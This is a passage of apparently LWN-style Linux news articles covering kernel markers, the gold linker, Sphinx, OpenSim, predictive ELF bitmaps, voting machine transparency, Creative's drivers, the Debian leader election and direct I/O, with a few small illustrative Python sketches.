for use with DTrace, but Linux, thus far, has none.  That situation should
eventually change - static markers were only merged into the mainline in
2.6.24.  But, as the developers start to look more seriously at markers,
some interesting issues are coming up.

One of those emerged as a result of this
patch from Mathieu Desnoyers which allows proprietary modules to
contain markers.  The fact that current kernels do not recognize markers in binary-only
modules is mostly an accident: markers are disabled in modules with any sort
of taint flag set as a way to prevent kernel crashes - a kernel oops being
a rather heavier-weight marker than most people wish to encounter.
Mathieu tightened that test in a way that allows markers in proprietary
modules, saying "let's see how people react."  Needless to
say, he saw.


One might well wonder why the kernel developers, not known for their
sympathy toward proprietary modules in general, would want to consider
letting those modules include static tracepoints.  The core argument here
is that static markers allow proprietary modules to export a bit more
internal information to the kernel, and to their users.  It is seen as a
sort of (very) small opening up on the part of the proprietary module
writer.  Mathieu says:


	I think it's only useful for the end user to let proprietary
	modules open up a bit, considering that proprietary module writers
	can use the markers as they want in-house, but would have to leave
	them disabled on shipped kernels.


The idea is that, by placing these tracepoints, module authors can help
others learn more about what's going on inside the module and help people
track down problems.  The result should be a more stable kernel which -
whether proprietary modules have been loaded or not - is generally
considered to be a good thing.


On the other hand, there's no shortage of developers who are opposed to
extending any sort of helping hand to binary module authors.  Giving those
modules more access to Linux kernel internals, it is argued, only leads to
trouble.  Ingo Molnar put it this way:


	Why are we even arguing about this? Binary modules should be as
	isolated as possible - it's a totally untrusted entity and history
	has shown it again and again that the less infrastructure coupling
	we have to them, the better.


Ingo also worries that allowing binary modules to use markers will serve to
make the marker API that much harder to change in the future.  Since that
API is quite young, chances are good that changes will happen.  As much as
the kernel developers profess not to care about binary-only modules, the
fact of the matter is that there are good reasons to avoid breaking those
modules.  The testing community certainly gets smaller when testers cannot
load the modules they need to make their systems work in the manner to
which they have become accustomed.  So it is possible that allowing
proprietary modules to use markers could make the marker API harder to fix
in future kernel releases.

The grumbles have been loud enough that Mathieu's patch will probably not
be merged for 2.6.25.  The idea is likely to come back again, but
not necessarily right away: the marker feature may have been merged in
2.6.24, but it would appear that 2.6.25 will be released with no actual
markers defined in the source.  It's not clear that binary-only module
authors are pushing to add tracepoints when none of the other developers
are doing so.  Until somebody starts actually using static markers, debates
on where they can be used will continue to be of an academic nature.

		Distribution-friendly projects - Part 1


[Editor's note: This article, which looks at the interactions of
software projects and distribution providers, will be presented in three
parts.]

Introduction
In today's world most users of Linux don't build their system from scratch
by downloading the sources of the applications and libraries they need and
building them by hand.  Most users will use one or more distributions (the
ones that best suit their needs), and they'll stick with the packages
provided by the distribution for as long as they can.

Power users may know how to get the software they want and build it so it
runs, but the average user won't go around looking for software that is not
readily available to them. The job of a distribution is, of course, to
provide as much software as its users will need, sometimes changing the
software so that it suits the needs of its users better.

The distribution's developers, the so-called downstream
developers, have different responsibilities compared to the
original software developers, the upstream developers. The former are
responsible directly to their users, while the latter are usually more
focused on implementing their software correctly for their own
standards (which means for instance implementing a protocol exactly as
described by the standard, or supporting a file format exactly as it
should be).

Most of the time, these two objectives are compatible with one
another, and users face an interface that hides the details of the
implementation.  Sometimes, though, there are user requests that
upstream developers won't acknowledge, for instance: to parse a
file that was written improperly by a commonly-used tool (maybe a
proprietary tool that does not support free software).  In these cases,
some distributions tend to edit the source, creating a modified version for
that particular distribution, with a different behaviour, interface, or
what not.

It's because of cases like this, especially in the last few
years, that there have been many arguments between original developers and
distributions, which sometimes involved legal threats, forks or
removal of software from distributions' repositories. It's not fun to
watch these arguments going by, and sometimes it's all because of
differences in opinion between the developers, or in how their
experiences have affected their views.

Starting with the idea that everybody wants to have the software they
wrote used, this article will try to explain what distributors want
and why they ask the original developers to cooperate toward that
goal. People who have worked both as an upstream developer and as a
downstream maintainer usually know what is being done with
their code in a distribution and why. For people who have only seen
one side, understanding of the needs or the reasons of the other side might
be a very difficult task.

Technical and philosophical needs
The majority of the
points where upstream and downstream have different
views can be divided into technical and philosophical
points. On the technical side, distributors need to make the
software build on their system, without lots of workarounds, and it should
follow the same behaviour as other software in their setup.  On the
philosophical side, they have needs relating to user requests
and expectations.  Users expect some consistency in how software looks and
behaves on their system.  Often, both of these kinds of matters relate to
the policy (written or unwritten) of that distributor.

While one might actually expect a philosophical debate between
developers on formats and how to implement a protocol, it's difficult to
understand how so many arguments are caused by different technical
requests. Unfortunately even the technical needs are often different
between upstream projects and distributions. The only way to
accommodate both is to provide choices, something that more often than not
is considered bad by the upstream developers, who do not
want the complication of too many choices.

I sincerely doubt there will ever be a time when all the
upstream developers and the downstream maintainers will
be on the same page, but it is possible to at least try to understand
what the other side wants, and see if it's possible to cover their
needs, without regressing.  Even if that means increasing the complexity a
bit.  It is true that most of today's tools, in every area, are more
sophisticated and complex than their equivalent years ago (tens of years
for computer tools, hundreds of years for other areas).

[This ends part 1 of this article.  Part 2 will look at the technical
needs of distributions and the upstream developers.  Finally, part 3 will
cover the philosophical concerns and present some conclusions.  Stay tuned
for part 2, which should air in two weeks.]

		Striking gold in binutils


A new linker is not generally something that arouses much interest outside
of the hardcore development community—or even inside it—unless
it provides something especially eye-opening.  A newly released linker,
called gold, has just that kind of feature, though, because it runs
up to five times as fast as its competition.  For developers who do a lot
of compile-link-test cycles, that kind of performance increase can
significantly increase their efficiency.


Linking is an integral part of code development, but it can be invisible,
as it is often invoked by the compiler.  The sidebar accompanying this
article is meant for 
non-developers or those in need of a refresher about linker operation.
For those who want to know even more, the author of gold, Ian Lance
Taylor, has a twenty-part series about linker internals on his weblog,
starting with this entry.


For Linux systems, the GNU Compiler
Collection (GCC) has been the workhorse,
providing a complete toolchain to build programs in a number of different
languages.  It uses the ld linker from the binutils collection.  With
the announcement
that gold has been added to binutils, there are now two
choices for linking GCC-compiled programs.


A linker overview

For non-developers, a quick overview of the process that turns source code
into executable programs may be helpful.
Compilers are programs that turn C—or other high-level
languages—into object code. Linkers then collect up object
code and produce an executable.  Usually the linker will not only operate
on object code created from a project's source, but will also reference
libraries of object code—the C runtime library libc for
example.  From those objects, the linker creates an executable program that
a user can invoke from the command line.
The linker allows program code in one file
to refer to a code or data object in another file or library.  It arranges
that those references are usable at run time by
substituting an address for 
the reference to an object.  This "links" the two properly in the executable.
 Things get more complicated when
considering shared libraries, where the library code is shared by multiple
concurrent executables, but this gives a rough outline of the basics of
linker operation. 
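
The basic job described in this overview can be sketched as a toy two-pass "linker". This is an illustration only, under loud assumptions: the dictionary layout for object files, the link() function, and the example sizes and offsets are all invented here, and real linkers (ld and gold included) deal with sections, relocation types, and much else that is left out.

```python
def link(objects, base_address=0x1000):
    """Lay out toy object files and resolve symbol references.

    Each object is a dict with hypothetical fields:
      name, size, defines {symbol: offset within object}, refs [symbols].
    Returns (symbol_table, resolved_references).
    """
    symbol_table = {}
    address = base_address

    # Pass 1: place objects one after another and record where each
    # defined symbol ends up.
    for obj in objects:
        for symbol, offset in obj["defines"].items():
            if symbol in symbol_table:
                raise ValueError(f"duplicate symbol: {symbol}")
            symbol_table[symbol] = address + offset
        address += obj["size"]

    # Pass 2: substitute an address for every reference.
    resolved = {}
    for obj in objects:
        for symbol in obj["refs"]:
            if symbol not in symbol_table:
                raise ValueError(f"undefined reference to {symbol}")
        resolved[obj["name"]] = {s: symbol_table[s] for s in obj["refs"]}
    return symbol_table, resolved


# Invented example: a program object that calls into a library object.
MAIN_O = {"name": "main.o", "size": 0x40,
          "defines": {"main": 0x0}, "refs": ["printf"]}
LIBC = {"name": "libc", "size": 0x100,
        "defines": {"printf": 0x20}, "refs": []}

if __name__ == "__main__":
    symbols, resolved = link([MAIN_O, LIBC])
    for name, addr in symbols.items():
        print(f"{name}: {addr:#x}")
```

Leaving the library out of the object list makes the second pass fail with an "undefined reference" error, which is the toy equivalent of a familiar linker complaint.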


The intent is for gold to be a complete drop-in replacement for
ld—though it is not quite there yet.  It is currently
lacking support for some command-line options and Linux kernels that are
linked with it do not boot, but those things will come.  It also currently
only supports x86 and x86_64 targets, but for many linker
jobs, gold seems to be working well.  The speed seems to be very
enticing to
some developers, with Bryan O'Sullivan saying:

When I switched to using gold as the linker, I was at first a little
surprised to find that it actually works at all. This isn't especially
common for a complicated program that's just been committed to a source
tree. Better yet, it's as fast as Ian claims: my app now links in 2.6
seconds, almost 5 times faster than with the old binutils linker!


Performance was definitely the goal that Taylor set for gold
development.  It supports ELF (Executable
and Linking Format) objects and runs on UNIX-like operating systems
only.  Supporting only one object/executable format, along with a fresh
start and an explicit performance goal, are some of the reasons that
gold outperforms ld. 


Tom Tromey likes the
looks of the code:

I looked through the gold sources a bit. I wish everything in the GNU
toolchain were written this way. It is very clean code, nicely commented,
and easy to follow. It shows pretty clearly, I think, the ways in which C++
can be better than C when it is used well.


Because the implementation is geared for speed, Taylor used techniques that
may confuse some.
He has some concerns
about the maintainability of his implementation:

While I think this is a reasonable approach, I do not yet know how
maintainable it will be over time. State machine implementations can be
difficult for people to understand, and the high-level locking is
vulnerable to low-level errors. I know that one of my characteristic
programming errors is a tendency toward code that is overly complex, which
requires global information to understand in detail. I've tried to avoid it
here, but I won't know whether I succeeded for some time.


Overall, it seems to be getting a nice reception from the community, with
O'Sullivan commenting that he is "looking forward to the point where
gold entirely supplants the existing binutils linker. I expect that won't
take too long, once Mozilla and KDE developers find out about the
performance boost."  Once gold gets to that point, Taylor
is already thinking about concurrent
linking—running compiler and linker at the same time—as
the next big step.


There are two other ongoing projects that are working with the greater GCC
ecosystem in interesting ways: quagmire and ggx.  Quagmire is an effort to
replace the GNU configure and build system—consisting of autoconf,
automake, and libtool—with something that depends
solely on GNU make.  Currently, that system uses
various combinations of the shell, m4, and portable makefiles to make the
building and installation of programs easy—the famous
"./configure; make" command line.  The tools were written that way
to try and ensure that users did not need to install additional packages to
configure and build GNU tools.
Quagmire, which has roots in a
posting by Taylor,
recognizes that GNU make is ubiquitous, so basing a
system around that makes a great deal of sense.


The ggx project is Anthony Green's step-by-step procedure to create an
entire toolchain that can build programs for a processor architecture that he is
creating as a thought
experiment.  The basic idea is to design the instruction set based on
the needs of the compiler, in this case GCC, rather than the needs of the
hardware designers.  He is using GCC's ability to be retargeted for new
architectures, along with its simulation capabilities to create a CPU that
he can write programs for.  As of this writing, he has a "hello world"
program working, along with large chunks of the GCC test suite passing.
Well worth a look.


		Introducing Sphinx, the Python documentation toolchain


The first public release of the Python Sphinx documentation system,
which should not be confused with the CMU Sphinx speech recognition project,
has been announced.


Sphinx is a tool that makes it easy to create intelligent and beautiful documentation for Python projects, written by Georg Brandl and licensed under the BSD license.
It was originally created to translate the new Python documentation, but has now been cleaned up in the hope that it will be useful to many other projects. (Of course, this site is also created from reStructuredText
sources using Sphinx!)


The Sphinx
introduction
states:
"The focus is on hand-written documentation, rather than auto-generated API docs. Though there is limited support for that kind of docs as well (which is intended to be freely mixed with hand-written content), if you need pure API docs have a look at Epydoc, which also understands reST."


An interesting feature of the Sphinx web pages is the inclusion
of their own document source code.
The document source code from the previously mentioned Sphinx
introduction page is a good place to go to get a look at the
reStructuredText language that Sphinx uses.
More information on that language can be found in
A ReStructuredText Primer, the
Quick reStructuredText user reference and the
reStructuredText Cheat Sheet.


The Sphinx feature list includes:


Cross-platform, works under a variety of operating systems.
Support for the HTML, Windows HTML Help, and LaTeX output formats.
Can use Jinja (a template engine modeled on Django's) for creating HTML templates.
Includes semantic markup and automatic links for cross-referencing.
The documentation tree is hierarchically structured.
Indexes are automatically generated.
Sphinx can optionally use the Pygments programming language syntax highlighter.
Supports a number of extensions for code snippet testing and more.


The Python source code and related files for
Sphinx are available for download
here.
The 
change log shows that a number of recent releases have been made.
As of this writing,
the current version is release 0.1.61950, dated March 26, 2008.


If you need to maintain a collection of web-based or
print-based project documentation, Sphinx could be a very
useful tool.


		Toward a free metaverse


Last month, an article about
another attempt to free the proprietary Ryzom game expressed
frustration with the implied idea that the free software community could
not, on its own, create a game experience comparable to Ryzom.  One of the
resulting comments took issue
with (what was seen as) a dismissive attitude toward the Second Life client
and pointed out some of the work which is being done based on that client.  So your
editor decided to take another look.  The bottom line is this: the work
being done in this area is still in an early and unstable state, but it
does have the potential to open a new frontier for free software in the
area of virtual environments.


The Second
Life client for Linux is now in a beta release.  "Beta," in this case,
means that all of the features have, in some way, been implemented; now
it's just a matter of making it all actually work.  Your editor found the
client to be slow, unwieldy, crash-prone, and very fussy about its graphics
environment.  Your editor's well-supported (in X) Intel-based desktop was
not adequate for this client, for example; the associated documentation
recommends a long list of cards which (for now) are only supported with
proprietary drivers.  Still, on the right system, the
client is able to render three-dimensional worlds with the same quality
that, well, Second Life has on any platform.


An alternative is OpenViewer, a
C#/Mono-based, BSD-licensed viewer project.  Your editor had little luck
getting this client going, but the screenshots are nice.  The developers
appear to have made significant progress toward the creation of a
functional, three-dimensional client; this is a project to watch.  Less far
along is the Aether project,
which is working on an OpenViewer-based client meant to run within Firefox;
thus far, it has a nice design diagram but not much else.


There is also RealXtend, a project
based on the Second Life client which is emphasizing performance and visual
quality.  Unfortunately, it also seems to be emphasizing Windows support,
so your editor did not give it a try.


Free software clients are certainly an important tool to have; we will not
be able to access this kind of virtual environment without them.  But it
would be a real shame if these clients simply facilitated a world where we
use free clients to access locked-down, proprietary virtual worlds on
somebody else's server.  What would be much better would be the ability to
create our own virtual worlds - using free software, of course - and to
link those worlds into a larger virtual universe.  That is the formula
which made the World Wide Web (and many other Internet services) work, and
it should certainly be applicable in this context as well.


The good news is that people are working in this area.  One project, OpenSim, has the look of
something which is about to achieve much wider awareness as its features
mature.  In short, OpenSim is a virtual world server which can be deployed
to create environments much like what one would find in Second Life.  It
works with the Second Life client and with OpenViewer as well, and it
presents a very similar experience - at least, in the virtual worlds which
have been deployed so far.  Since it's free software, it can be customized
toward the creation of different kinds of environments, including
role-playing games and such.


It is written with C# and Mono - seemingly a common choice for this kind of
software.  The Mono environment, for all its faults and potential pitfalls,
may well make it easier to create a cross-platform application with the
requisite features.


What makes OpenSim really interesting, though, is its ability to connect
servers together in a "grid" mode.  Once this is done, a virtual world is
not limited to a single entity's server (or imagination).  Servers across
the net can be interconnected into a single, larger world.  This is the
feature which has the potential to take OpenSim from another interesting
project into something which transforms the net.


There are a number of people organizing grids with OpenSim now; there is a list of public grids
on the OpenSim site.  Some of them appear to be relatively proprietary
operations offering the opportunity to buy virtual land - though subprime
loans are unavailable.  Others allow anybody to connect their server
into the grid and become part of the whole.  These grids appear, in
general, to be in a sort of early adopter state at the moment, but much of
the fundamental functionality is there.  How hard could it be to make it
all work properly at this point?


The answer to that question, of course, is "quite hard."  But the fact
remains that people are working on this very interesting problem, and they
are making significant progress toward solving it.  These projects bear
watching; they may well be planting the seeds of the systems we will all be
using in the coming years.

		Predictive ELF bitmaps


When the kernel executes a program, it must retrieve the code from disk,
which it normally does by demand paging it in as required by the execution
path.  If the kernel could somehow know which pages would be needed, it
could page them in more efficiently.  Andi Kleen has posted an experimental set of patches that do just that.


Programs do not know about their layout on disk, nor is their path through
the executable file optimized to reduce seeking, but with some information
about which pages will be needed, the kernel can optimize the disk
accesses.  If one were to gather a list of the pages that get faulted in
as a program runs, that information could be saved for future runs.  It
could then be turned into a bitmap indicating which of the pages should
be prefetched.
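
As a rough illustration of that last step, the sketch below turns a list of faulting file offsets into a one-bit-per-page bitmap. It is not taken from Kleen's patches: the function names, the 4096-byte page size, and the bit ordering within each byte are all assumptions made for the example.

```python
PAGE_SIZE = 4096  # assumed page size for the example


def build_bitmap(fault_offsets, file_size, page_size=PAGE_SIZE):
    """Return a bytearray with one bit per page of the file.

    A bit is set if any recorded fault offset fell within that page.
    """
    n_pages = (file_size + page_size - 1) // page_size
    bitmap = bytearray((n_pages + 7) // 8)
    for offset in fault_offsets:
        page = offset // page_size
        if page < n_pages:  # ignore offsets past the end of the file
            bitmap[page // 8] |= 1 << (page % 8)
    return bitmap


def pages_to_prefetch(bitmap):
    """List the page numbers whose bits are set in the bitmap."""
    return [page for page in range(len(bitmap) * 8)
            if bitmap[page // 8] & (1 << (page % 8))]


if __name__ == "__main__":
    # Faults recorded in pages 0 (twice), 2 and 10 of a 12-page file.
    bitmap = build_bitmap([0, 100, 8192, 40960], file_size=12 * PAGE_SIZE)
    print(pages_to_prefetch(bitmap))
```

A 12-page executable needs only two bytes of bitmap here, which suggests why storing such data alongside the executable is tempting.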


Once you have such a bitmap, where to store it becomes a problem.  Kleen's
method uses a "hack" to the ELF format on disk, putting the bitmap at the
end of the executable.  This has a number of drawbacks: a seek to get
the info, modifying the executable each time you train, and only allowing a
single usage pattern system-wide.  It does have one very nice attribute,
though: the bitmap and executable stay in sync; if the executable changes,
due to an upgrade for instance, the bitmap would get cleared in the
process.  Alternative bitmap storage locations—somewhere in users'
home directories for example—do not have this property. 


Andrew Morton questions whether this need be done in the kernel
at all:

Can't this all be done in userspace?  Hook into exit() with an LD_PRELOAD,
use /proc/self/maps and the new pagemap code to work out which pages of
which files were faulted in, write that info into the elf file (or a
separate per-executable shadow file), then use that info the next time the
app is executed, either with an LD_PRELOAD or just a wrapper.


Ulrich Drepper
does not want to see the ELF format abused in the fashion it was for this
patch; Kleen doesn't either, but used it as an expedient.  Drepper thinks the linker
should be taught to emit a new header type which would store the bitmap. It
would be near the beginning of the ELF file, eliminating the seek.   A
problem with that approach is that old binaries would not be able to take
advantage of the technique; a re-linking would be required. 


Then the
question arises, how does that bitmap get initialized?  Drepper suggests that systemtap be used: 

To fill in the bitmaps one can
have a separate tool which is explicitly asked to update the
bitmap data. To collect the page fault data one could use systemtap.
It's easy enough to write a script which monitors the minor page
faults for each binary and writes the data into a file.  The binary
update tool can use the information from that file to generate the
bitmap.


Kleen's patch walks the page tables for a process when it is exiting,
setting a bit in the bitmap if that page has been faulted in.  Drepper sees
this as suboptimal:

Over many uses of a program all kinds of
pages will be needed.  Far more than in most cases.  The prefetching
should really only cover the commonly used code paths in the program.
If you pull in everything, this will have advantages if you have that
much page cache to spare.  In that case just prefetching the entire
file is even easier.  No, such an improved method has to be more
selective.


The problem is in finding the balance between just prefetching the entire
executable—which might be very wasteful—and prefetching the
subset of pages that are most commonly used.  It will take some heuristics
to make that decision.  As Drepper points out, recording the entire runtime
of a program "will result in all the pages of a
program to be marked (unless you have a lot of dead code in the binary
and it's all located together)."


The place where Drepper sees a need for kernel support is in providing a
bitmap interface to madvise() so that any holes in the pages that
get prefetched do not get filled by the readahead mechanism.  The current interface
would require a call to madvise() for each contiguous region, which
could add up to a large number of calls.  Both he and Morton favor the
bulk of the work being done in user space.
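
To see why the per-region interface could get expensive, the sketch below groups a set of wanted pages into contiguous runs; with the current interface, each run would correspond to one madvise() call. The contiguous_runs() helper is a hypothetical name used only for this illustration, and no actual madvise() calls are made.

```python
def contiguous_runs(pages):
    """Group page numbers into (first_page, page_count) runs."""
    runs = []
    for page in sorted(set(pages)):
        if runs and page == runs[-1][0] + runs[-1][1]:
            runs[-1][1] += 1         # extends the current run
        else:
            runs.append([page, 1])   # starts a new run
    return [tuple(run) for run in runs]


if __name__ == "__main__":
    wanted = [0, 1, 2, 5, 7, 8]
    runs = contiguous_runs(wanted)
    print(f"{len(runs)} calls needed for runs {runs}")

    # Worst case: every other page is wanted, so every page is its own run.
    sparse = list(range(0, 100, 2))
    print(f"{len(contiguous_runs(sparse))} calls for {len(sparse)} pages")
```

A fragmented access pattern therefore costs roughly one call per page, which is the overhead a bitmap-based interface would avoid.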


Overall, there is lots more work to do before "predictive bitmaps" make
their way into a Linux system—if they ever do.  To start with, some benchmarking will have to be done
to show that performance improves enough to consider making a change like
this.  David Miller expresses some pessimism about the
approach:

I wrote such a patch ages ago as well.

Frankly, based upon my experiences then and what I know now, I think
it's a lose to do this.


It is an interesting idea though, one that will likely crop up again if
this particular incarnation does not go anywhere.  Since the biggest efficiency
gain is from reducing seeks, though, it may not be interesting long-term. 
As Morton says, "solid-state disks are going to put a lot of code out
of a 
job."

		Voting machine integrity through transparency


It is hard to believe that governments would spend money on voting
equipment that they are not allowed to test, but that is
exactly what multiple counties in New Jersey appear 
to have done.  They are certainly not alone; many other places are
likely to have the same restrictions on "their" voting machines.  This raises the question:
where are the free software voting systems?


Union County wanted to ask Ed Felten to look at the voting machines it
purchased from Sequoia Voting Systems because of several
anomalies—less charitably known as miscounts—observed when using
them in the primary elections.  Once Sequoia got wind of the plan, they
emailed Felten a nastygram
because he might engage in "non-compliant analysis" of the machines in
violation of the Sequoia license.  It seems quite likely that is exactly
what Felten and the county clerk had in mind as a third-party analysis is
the only sensible way to evaluate voting machines.


Other jurisdictions have done better of late, with Felten's Freedom to
Tinker weblog noting that California has denied
certification for two voting machines from Election Systems & Software
(ES&S).  California Secretary of State Debra Bowen has been at the
forefront of trying to ensure
that voting machines work correctly.  LWN's home state of Colorado also
decertified
a number of voting machines, but, like the earlier California study, it
was done after those machines were purchased.  As in California, it
seems likely that Colorado will be using those machines in November.


Things are getting a little better, perhaps, but no one has, as yet, tried
to take on the four major voting machine makers with a system that is built
with security in mind.  There is no reason that the source code for a
voting machine could not be made available for study.  The voting machine
vendors claim all sorts of proprietary secret sauce in their code, but that
isn't the real reason they hide it.  Covering up their shoddy code is much more likely.


Every independent review of voting machines has found numerous,
fundamental security flaws that should make anyone with an interest in the
integrity of the election process cringe.  Many of those analyses were done
without the source code, so there is little doubt that even uglier problems
would have been found in the code itself.  It just cannot be that difficult to
produce something vastly more secure than what is made available today.


One could speculate about the motives of these companies, but it is more
fruitful to look at what could be built with mostly off-the-shelf
software.  The place to start is by hiring a few good security-minded
developers, while lining up an independent review team.  One might guess
that Felten and his associates would be a good place to start.


A stripped down Linux system could very easily be the basis for a voting
machine, but other free software choices would serve just as well.  Some
user interface code for touchscreens and alternative input methods
for those with disabilities would need to be written.  Some kind of
printing output device would need to be made a part of the system so that
voter-verifiable audit trails—better yet, ballots that can be put
into a locked box—can be created.


Source code availability does not, in and of itself, ensure vote security.
That code needs to be reviewed by as many experts as can be found.  In
addition, there needs to be some mechanism to show that the source code
being reviewed is the same as that being run.


For that reason, the system itself might make use of some kind of Trusted
Platform Module (TPM) chip so that interested parties can verify that the
published code is the same as that running on the system.  If the system
runs Linux, it might use the integrity management patches
for that.  Most importantly, the outside interfaces (network, USB, PCMCIA,
etc.) to the device would either not be present or be very tightly
controlled.  Any kind of removable vote recording memory would need
adequate cryptographic safeguards to eliminate tampering between vote
taking and vote tabulating machines.


Instead of an emphasis on PR, schmoozing, and bamboozling non-technical
folks, the focus of a free software
voting system would be on transparency.  The number one goal would be to
give everyone, from the least technical voter to the Bruce Schneiers of
the world, confidence in the machines and the process.  It is hard to
fathom how anyone could want anything less.


		A creative example of the value of free drivers


Free operating systems differ from the proprietary variety in a number of
ways.  One of the differences which is most evident to all users is in the
provision of device drivers.  With free systems, device drivers are free
software, provided with the system itself.  Proprietary systems tend to
provide relatively few drivers; instead, proprietary drivers are shipped
with the hardware itself and installed separately.  Anybody who wonders
about which model works better would be well advised to look at the events of
March 28, when Creative Labs shut
down an outside developer who had been working to improve Creative's
drivers.


Creative is, of course, a long-time manufacturer of audio hardware.
Opinions vary on the quality of that hardware, but there can be no doubt
that Creative has been successful in this market.  Creative's customers
have found, though, that moving to Vista has been an unusually painful
experience, even by the standards of that particular system.  It seems that
Creative's drivers have failed to provide the same level of functionality
found in previous versions, leaving customers with crippled hardware.
Strangely enough, said customers have not been entirely pleased with this
state of affairs.


Enter a developer called "Daniel_K".  Daniel took the time to figure out
how the hardware worked and to patch Creative's drivers to, once again,
provide access to the full capability of the hardware.  He then made those
drivers available to others.  Creative hardware owners were happy about
this: somebody had finally managed to solve the problems they had been
complaining about.  One would have expected Creative to be happy too; happy
customers tend to be good for business.


That's not the way of it, though.  Instead, Creative removed links to the
fixed drivers from its forums and posted a public cease-and-desist letter.
According to Creative's Phil O'Shaughnessy:


	By enabling our technology and IP to run on sound cards for which
	it was not originally offered or intended, you are in effect,
	stealing our goods.  When you solicit donations for providing
	packages like this, you are profiting from something that you do
	not own.  If we choose to develop and provide host-based processing
	features with certain sound cards and not others, that is a
	business decision that only we have the right to make.


There can be little doubt that Creative is operating within its legal
rights here.  It has retained proprietary rights to its driver software,
and it has imposed the usual sort of "thou shalt not reverse engineer" EULA
on its users.  So, while Daniel_K may (or may not) have been able to
legally reverse engineer the driver (depending on his location), he almost
certainly did not have the right to redistribute modified versions of
Creative's drivers.  Asking for donations to help him continue this
activity will not have made him any friends at Creative either.  When
dealing with other peoples' proprietary software in this manner, one should
not be surprised to get shutdown notices.


Creative may be on solid ground legally, but it still makes sense to look
at what is going on here.  One might have attributed the driver problems to
a lack of competence at Creative, or, perhaps, to the general sort of
misery that (your editor has heard) goes along with Vista.  Instead,
Creative's crippled drivers were the result of a "business decision."
Rather than allow its customers to get the most out of the hardware they
thought they owned, Creative decided to restrict that functionality,
presumably as a way of motivating those customers to buy newer, shinier,
better-supported hardware.  Daniel_K, by making Creative's customers
happier, was threatening Creative's chosen business strategy.


Now consider a company whose hardware is supported by free drivers.  That
company lacks the ability to use crippled drivers as a tool to "encourage"
customers to replace their hardware.  Instead, that company has every
incentive to provide the best hardware possible and to ensure that said
hardware works to its fullest capability.  Such a company would welcome an
outsider who made their products work better; those outsiders would be more
likely to receive job offers than cease-and-desist letters.  Rather than
calling out the lawyers, this company could focus on the business of being
a hardware company.


Your editor knows which sort of company he would (and does) choose to buy
hardware from.  Free drivers are not just a path toward higher-quality
support, though that is typically the result.  They are not just a way to
help ensure that the kernel as a whole remains stable and debuggable.  And
free drivers are not just a way to help ensure that all can learn and benefit
from the work which was done to get the hardware working.  They are also a
way to avoid the threat of manipulation by hardware vendors who have
decided that providing the best value for customers is no longer a winning
business strategy.  That is a sort of freedom which is worth having.

		Debian Project Leader Election 2008


The Debian Project Leader election is well underway.  The debate is over
and the first call for votes has gone out.
If it seems like the process is going faster this year, that's because it
is.  Last year a constitutional
amendment to reduce the length of the DPL election process was adopted
by the developers.

There were three candidates nominated for this year's election: Marc
Brockschmidt, Raphaël Hertzog and Steve McIntyre.  Information about
this election can be found on this year's vote page.

Steve McIntyre has been a Debian Developer for more than 11 years.  During
that time he acquired a wide range of packaging experience, worked on
creating the official CDs (and DVDs) and hosting machines used by Debian.

Steve also served as Assistant Project Leader under Anthony Towns, so he
has some idea of what the job entails.  This is not the first time he's run
for DPL either.  In addition to this year's
platform, his 2006 and 2007 platforms
are also available.

While Steve has no plans to appoint a DPL team, he is willing to delegate
tasks when appropriate.  His goals include improving communications within
the project and improving the workflow, getting people to ask for help when
they need it or to step down when they can't devote enough time to the
job.

  In my opinion, a key part of working effectively is honesty. We can all
  suffer from a lack of time to do the jobs that we've promised to
  do. After all, real life has a nasty habit of intruding on our so-called
  "spare" time. So long as we don't let things delay too far, we can cope
  and still contribute. But at some point, we need to be more honest with
  ourselves and actually admit that we can't continue with the jobs that
  we've promised to do. It's a hard thing to do, but in a friendly
  community where we're all working together towards a common goal there
  should be no shame in asking for help.


Raphaël Hertzog is also no stranger to DPL elections.  He ran in 2002 and 2007, in
addition to this year.

Raphaël has proposed a small team of two other individuals (Moritz
Muehlenhoff and Lucas Nussbaum) to help him with the DPL duties.  His goals
include making Debian more visible and recruiting more contributors.

  While the number of packages in Debian increased a lot since 2001, the
  number of active developers stayed the same. We could definitely use more
  developers to continue increase the quality of our distribution (teams
  with hundreds of bugs are quite common). We made a first step with the
  Debian Maintainer proposal, but we can do more. I'm not saying that we
  should give upload rights to less skilled people: we don't want to
  compromise on quality.


He would also like to improve the core teams such as keyring managers,
NM/DAM, ftpmasters, and the press team.  Unofficial services that have
proved useful (mentors.debian.net and backports.org) should be integrated
officially into Debian.

Marc Brockschmidt has been a Debian Developer since 2004 and has been
involved in many parts of Debian since then, including helping with the New
Maintainer process, as an AM to dozens of people, at the NM Frontdesk and
working with the release team.  He also helps to manage a network of hosts
used for autobuilding, porting and other Debian-related services.
Improving communications is a popular goal for DPL candidates, but Marc has
some thoughts on that:

  Before writing this platform, I had a look at the platforms of the past
  years and was amazed that nearly everyone talked about "improving
  communication", usually meaning that flaming shouldn't be allowed. I
  don't think this is possible - we can hardly replace all involved
  developers by cuddly stuffed animals. Good software developers have a
  strong opinion about topics dear to their heart, two good developers
  usually have two different opinions. Discussion, even bordering on
  flames, is OK - as long as it leads to a result.


He would like to see more "Bits from ..." mails on debian-devel-announce
for better internal communication.  He would also like to see better
presentation of Debian to outsiders.  Like Raphaël, he would like
backports.org to become an official Debian service.  Summer of Code has
been useful in bringing together some cool ideas with people who can work
on them.  Marc would like to see that wiki page remain active throughout
the year.  Marc admits that he doesn't have as much free time as the DPL
will take, and plans to delegate heavily, especially finding others to
present Debian to the rest of the world at conferences.

Voting for these candidates will be open until April 13 and the term
for the new DPL will start soon after, on April 17, 2008.

		Toward better direct I/O scalability


Linux enthusiasts like to point out just how scalable the system is; Linux
runs on everything from pocket-size devices to supercomputers with several
thousand processors.  What they talk about a little bit less is that, at
the high end, the true scalability of the system is limited by the sort of
workload which is run.  CPU-intensive scientific computing tasks can make
good use of very large systems, but database-heavy workloads do not scale
nearly as well.  There is a lot of interest in making big database systems
work better, but it has been a challenging task.  Nick Piggin appears to
have come up with a logical next step in that direction, though, with a
relatively straightforward set of core memory management changes.


For some time, Linux has supported direct I/O from user space.  This, too, is a scalability
technology: the idea is to save processor time and memory by avoiding the
need to copy data through the kernel as it moves between the application
and the disks.  With sufficient programming effort, the application should
be able to make use of its superior knowledge of its own data access patterns
to cache data more effectively than the kernel can; direct I/O allows that caching
to happen without additional overhead.  Large database management systems
have had just that kind of programming effort applied to them, with the
result that they use direct I/O heavily.  To a significant extent, these
systems use direct I/O to replace the kernel's paging algorithms with their
own, specialized code.
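
For readers who have not used it, direct I/O from user space looks roughly
like the sketch below.  The helper names and the 4096-byte alignment are
assumptions for illustration; the real alignment requirement depends on the
device and filesystem, and some filesystems reject O_DIRECT entirely.

```c
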